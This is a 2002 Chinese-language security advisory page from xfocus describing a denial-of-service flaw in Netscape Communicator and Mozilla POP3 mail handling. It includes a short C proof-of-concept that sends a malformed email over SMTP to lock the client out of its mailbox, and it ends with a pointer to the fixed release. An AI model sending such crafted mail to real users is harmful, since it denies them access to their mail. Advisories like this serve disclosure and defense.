xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Netscape / Mozilla畸形EMAIL POP3拒绝服务攻击漏洞


发布时间:2002-06-15
更新时间:2002-06-15
严重程度:
威胁程度:远程拒绝服务
错误类型:意外情况处置错误
利用方式:服务器模式

受影响系统
Netscape v =<4.77
Mozilla <1.1
详细描述
Netscape Communicator和Mozilla浏览器支持邮件和从POP3服务器上抓取邮件功能。

其中存在漏洞,畸形EMAIL信息可以导致Netscape Communicator和Mozilla不能访问POP3的邮箱,用户不能利用POP3访问新的信息或者删除邮件。

测试代码
/* this is the code that comes with my
* advisory #1 to illustrate this...
* eldre8 at afturgurluk (double dot minus one) org
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"

#define PORT 25

int sock;
char buffer[255];

void SigCatch() {
    fprintf(stderr, "\b\bbye!\n");
    close(sock);
    exit(0);
}

int main() {
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;

    signal(SIGINT, SigCatch);

    hp=gethostbyname(MX);
    sock=socket(AF_INET, SOCK_STREAM, 0);
    if (sock<0) {
        perror("sock");
        return -1;
    }

    sout.sin_family=AF_INET;
    sout.sin_port=htons(PORT);
    memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
    if (connect(sock, &sout, sizeof(sout))<0) {
        perror("connect");
        return -1;
    }
    recv(sock, buffer, 255, 0); /* receive the banner... */
    send(sock, EHLO, sizeof(EHLO), 0);
    recv(sock, buffer, 255, 0); /* receive the welcome message... */
    send(sock, MAIL, sizeof(MAIL), 0);
    recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
    send(sock, RCPT, sizeof(RCPT), 0);
    recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
    send(sock, DATA, sizeof(DATA), 0);
    recv(sock, buffer, 255, 0);
    i=sprintf(buffer, "b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
    *(buffer+i)="\x0";
    sprintf(buffer+i+1, "\n.\n");
    send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
    recv(sock, buffer, 255, 0);
    send(sock, QUIT, sizeof(QUIT), 0);
    recv(sock, buffer, 255, 0);
    close(sock);

    return 0;
}

解决方案
Mozilla 1.1版本不存在此漏洞:

http://www.mozilla.org/releases/

相关信息
eldre8 <eldre@afturgurluk.org>.
参考:http://online.securityfocus.com/archive/1/276628
相关主页:http://www.mozilla.org/
http://home.netscape.com/download/index.html
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved